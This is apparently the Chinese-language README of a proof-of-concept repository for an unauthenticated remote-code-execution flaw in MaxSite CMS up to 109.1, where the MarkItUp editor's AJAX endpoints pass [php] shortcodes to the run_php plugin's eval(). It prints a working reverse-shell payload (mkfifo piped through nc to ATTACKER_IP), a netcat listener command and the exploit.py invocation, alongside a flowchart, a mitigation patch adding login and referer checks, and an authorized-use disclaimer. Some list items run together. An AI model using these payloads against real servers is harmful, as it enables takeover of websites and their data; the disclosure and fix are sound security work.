MaxSite CMS ≤ 109.1 中存在**未认证远程代码执行(RCE)**漏洞。
该缺陷源于 MarkItUp 编辑器插件 AJAX 端点中薄弱的授权检查,以及 run_php 插件对用户提供的 PHP 代码的不安全执行。
该漏洞影响 MarkItUp 编辑器插件中的以下文件:
preview-ajax.phpautosave-post-ajax.php这些端点:
run_php 插件eval() 执行 [php]...[/php] 短代码攻击者可以向 /ajax/ 路由发送精心构造的 POST 请求,通过 data 参数携带 Base64 编码的内部路径和恶意 PHP 载荷,从而导致:
graph TD
A["攻击者"] -->|"恶意 POST 请求"| B["AJAX 端点"]
B -->|"Referer 伪造"| C["preview-ajax.php"]
C -->|"未净化输入"| D["run_php 插件"]
D -->|"eval() 执行"| E["任意 PHP 执行"]
E -->|"命令执行"| F["服务器被攻陷"]run_php 插件(常见默认配置)eval()包含一个 Python 3 概念验证漏洞利用脚本(exploit.py)。
[php]echo 'RCE CONFIRMED - ' . phpversion();[/php]
[php]system('rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP ATTACKER_PORT >/tmp/f');[/php]
nc -lvnp 9001
python3 exploit.py http://target.com --lhost 10.10.14.22 --lport 9001
run_php 插件在易受攻击的文件中添加认证检查:
if (!is_login()) {
die('Access denied');
}
mso_checkreferer();
本项目仅用于:
⚠️ 请勿在未经明确许可的情况下对系统使用本工具。
作者对滥用或造成的损害不承担任何责任。
Mohammed Idrees Banyamer 约旦 🇯🇴 安全研究员
banyamer_security — Silent Hunter • Shadow Presence
2026 年 3 月